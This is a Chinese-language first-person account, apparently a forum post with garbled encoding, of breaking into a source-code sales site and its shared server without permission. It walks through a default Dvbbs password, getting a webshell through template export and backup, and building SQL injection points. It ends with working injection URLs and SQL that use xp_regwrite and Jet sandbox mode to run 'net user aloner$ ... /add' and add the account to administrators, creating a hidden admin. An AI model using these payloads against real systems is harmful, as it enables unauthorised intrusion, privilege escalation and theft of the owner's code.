艱難滲透源碼銷售站點(diǎn)

1、艱難滲透源碼銷售站點(diǎn)題外話:最近想做幾個(gè)垃圾站玩玩?？墒稚嫌譀]有啥好程序。郁悶。那些網(wǎng)上免費(fèi)的程序又沒多少好玩意。百度看看網(wǎng)上誰賣程序。方便的話,搞幾個(gè)下來玩玩好了。一:小碰頭:百度上找了一會, HYPERLINK / /看到這個(gè)站上有幾個(gè)我喜歡的程序。咋辦?試試看吧。當(dāng)時(shí)一看這站,哪像個(gè)出售源碼程序的站。這么丑。用的啥系統(tǒng)我想大家不說我說也知道了吧。當(dāng)然,人家手上既然有這么多源碼,想必也是通過自己的入侵手段搞來的。那他的主站也基本上就不需要看了。隨便在一個(gè)url上添加個(gè)單引號出現(xiàn)了這個(gè)。加了防注入了.算了。不錯(cuò)主站入手了。拿出我們最喜歡的東西吧。 HYPERLINK /ip-domains.

2、html /ip-domains.html( HYPERLINK /ip /ip)查到同一服務(wù)器上有這些站。有53個(gè)站。心里開心了。旁注有望啊。從主站也得知這些網(wǎng)站都是網(wǎng)站管理員的出售中的程序。所以給他們分配的也都是2級域名。大家會想了。2級域名?會不會如果直接搞定一個(gè)webshell,就可以得到所有程序呢?因?yàn)樗麄冞@些演示站點(diǎn)或許會是在主站的下級目錄吧。當(dāng)初我也這么想的。先不說這個(gè)了。下面我們開始吧。我首先瞄準(zhǔn)了 HYPERLINK / /大家看到了什么?對,論壇。而且是動(dòng)網(wǎng)7.1的。不是吧?這么簡單就可以搞到一個(gè)webshell了？還賣源碼呢.唉。動(dòng)網(wǎng)默認(rèn)的密碼就進(jìn)去了。咱們登陸后臺拿we

3、bshell吧。Dvbbs7.1首先考慮后臺導(dǎo)出模板然后備份拿webshell.然后就導(dǎo)出了。問題也就來了。去看看備份數(shù)據(jù)庫那里能否備份。是可以備份的。導(dǎo)出模板不可以。上傳文件總還是會允許的吧?結(jié)果無論我上傳什么類型的文件。無論我怎么偽造文件。都顯示這個(gè)。難怪管理員會這么放心的把密碼設(shè)為默認(rèn)的。我想大概是方便購買的人查看吧。想了想。要是這樣的話?那不會所有的2級網(wǎng)站都是這樣吧？我是個(gè)不服輸?shù)娜?。大不了一個(gè)一個(gè)試。不就53個(gè)網(wǎng)站么？經(jīng)歷了“無數(shù)”的數(shù)據(jù)庫只讀,無寫入權(quán)限等問題。幾乎所有的2級都是這樣。看來管理員還是挺有意識。尷尬了。怎么辦？不會就這么放棄吧。二：峰回路轉(zhuǎn)。我沒有放棄。接著又找到一

4、動(dòng)網(wǎng)7.1默認(rèn)密碼。 HYPERLINK /BBS/ /BBS/哈哈。百密終有一疏啊。這么多的站?？偹氵€有一個(gè)沒把權(quán)限給卡住啊。成功導(dǎo)出后。然后通過備份拿到一個(gè)webshell.終于嘆了口氣。搞了大半天終于拿到了一個(gè)webshell.提權(quán)吧。無ws無任何第3方可以直接利用軟件。Aspx的馬馬運(yùn)行不了(其實(shí)服務(wù)器是支持.net的)。跳轉(zhuǎn)的d:/web/ 跳轉(zhuǎn)不了唉。提權(quán)無望啊。又不知道其他目錄的名稱。社工了好幾個(gè),都不能跳轉(zhuǎn)。想了想,同級目錄會不會允許跳轉(zhuǎn)呢?帶著僥幸的心理嘗試了下。大家會說了,根本就不知道其他的網(wǎng)站目錄其實(shí)要想知道一個(gè)同級目錄也不難。剛剛咱們不是還有個(gè)動(dòng)網(wǎng)默認(rèn)密碼的沒搞下來么?

5、大家有沒想到什么？動(dòng)網(wǎng)后臺在數(shù)據(jù)處理的系統(tǒng)信息檢測可以看到網(wǎng)站的路徑的。呵呵。對了。(其實(shí)還有的其他幾個(gè)站點(diǎn)可以通過aspcheck.asp來得知的。)哈哈。跳轉(zhuǎn)成功。但也就只能跳這個(gè)三級目錄。不過不要緊。舒服的東西在下面呢。習(xí)慣性的看了下數(shù)據(jù)庫連接文件。strconn = driver=sql server;server=(local);uid=xxx;pwd=xxx;database=xxx呵呵。是個(gè)SQL的數(shù)據(jù)庫。試試是否可以上傳文件到這個(gè)站。唉。權(quán)限還是不夠啊。那就用SQLtool直接連接吧。我暈。怎么可能呢?密碼難道錯(cuò)誤?不會啊。重新找了一下數(shù)據(jù)庫連接我文件。也就那么一個(gè)。那到底怎么

6、回事呢?很明顯,禁止了外部連接1433端口。如果是這樣的話那好辦。傳個(gè)SQLrootkit就可以了。事實(shí)證明了這一點(diǎn)。我用webshell自帶的SQL連接工具連接了。在我意料之中。這僅僅是個(gè)db權(quán)限的數(shù)據(jù)庫而已。Db權(quán)限的數(shù)據(jù)庫？大家想到了什么？呵呵。對了。Db 權(quán)限的注入點(diǎn)可以列目錄啊。既然服務(wù)器允許我們跳轉(zhuǎn)到3級目錄(這只是暫時(shí)的猜想,因?yàn)楫吘箷簳r(shí)只有一個(gè)3級目錄被我們跳轉(zhuǎn)了)。XP_CMDSHELL. 存在!SP_OACREATE. 存在!XP_REGWRITE. 存在!XP_SERVICECONTROL 存在!經(jīng)查詢。這些都還在。那就好辦了。直接構(gòu)造注入點(diǎn)吧。這里的admin必須是一個(gè)

7、存在的表名。我們可以通過SQL連接工具執(zhí)行SQL命令查詢。select name from sysobjects where type=U查詢出我們需要的表名?；蛘呶乙苍?./conn/encode.asp這個(gè)文件里找到這一句。sql=select count (*) from login where id=&cint(myid)很明顯。這里的login就可以被我們用上。strSQL = select * from login where id= & id 我們構(gòu)造出這樣的語句替換到上面的代碼中。至此。終于有了突破。成功構(gòu)造了注入點(diǎn)。呵呵。能夠列出目錄了。我們現(xiàn)在會想。要想搞到3389的終極權(quán)

8、限?，F(xiàn)在只能靠1433這個(gè)口子了。既然服務(wù)器支持我們跳轉(zhuǎn)到某些目錄。那咱們一一試過去不就行了。事情證明。找1433實(shí)在是太辛苦了。有的人大概會一個(gè)目錄一個(gè)目錄的去找吧。但有的網(wǎng)站只是access的。其實(shí)這也是我當(dāng)初的做法。后來兄弟可酷可樂告訴我。直接列出這個(gè)目錄d:Program FilesMicrosoft SQL ServerMSSQLData數(shù)據(jù)庫的前綴基本上是有規(guī)律的。那就是跟二級域名很相似。直接去找那些目錄就可以了。這樣就可以省下很多事。找到目錄后,一一的在webshell上跳轉(zhuǎn)。很順利。在通過幾次觀察后。管理員把SQL帳戶設(shè)置的很有規(guī)律。aaa1 aaa2 aaa3 aaa4 aa

9、a5 而密碼有都是一樣的。我這個(gè)人就是懶,喜歡偷懶。那這些用戶中會否有一個(gè)是SA的權(quán)限呢？趕緊去一個(gè)一個(gè)試。我從aaa1試到aaa16。呵呵。恭喜！SQL SERVER最高權(quán)限。還等什么？趕緊”net user” 吧。xpsql.cpp: 錯(cuò)誤 5 來自 CreateProcess（第 737 行）郁悶了。出現(xiàn)了這樣的情況。沒有足夠的權(quán)限創(chuàng)建進(jìn)程。難道不是SA權(quán)限? SA都被降權(quán)了?c: HYPERLINK / windowssystem32cmd.exe沒有被刪啊那怎么辦？想要用SQL查詢分析器連接吧，但1433又不對外開放。外部不可以連接。想把服務(wù)器上的1433端口轉(zhuǎn)發(fā)到本地吧。又無ws.

10、網(wǎng)上查了查資料。用沙盒模式提權(quán)來試下再來構(gòu)造個(gè)個(gè)SA的注入點(diǎn)。這不難。繼續(xù)構(gòu)造。再次執(zhí)行select name from sysobjects where type=U查詢myadmin這個(gè)數(shù)據(jù)庫中的表名。好了。成功構(gòu)造出來了。接著就是沙盒模式提權(quán)了。 HYPERLINK /Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20 /Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20HKEY_LOCAL_MACHINE,SoftWareMicrosoftJet4

11、.0Engines,SandBoxMode,REG_DWORD,0;- HYPERLINK /Manage/Include/sql.asp?id=1;Select /Manage/Include/sql.asp?id=1;Select*From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: HYPERLINK / windowssystem32iasias.mdb,select shell(net user aloner$ aloner /add);- HYPERLINK /Manage/Include/sql.asp?id=1;Select*

12、From /Manage/Include/sql.asp?id=1;Select*From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: HYPERLINK / windowssystem32iasias.mdb,select shell(net localgroup administrators aloner$ /add);-返回正常。說明成功了。或者用HDSI 執(zhí)行下面這些SQL命令。EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SoftWareMicrosoftJet4.0Engines,SandBoxMode,REG_DWORD,0Select * From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: HYPERLINK / windowssystem32iasias.mdb,select shell(net user aloner aloner /add);Select * From OpenRowSet(Microsoft.Jet.OLEDB.4.0,;Database=c: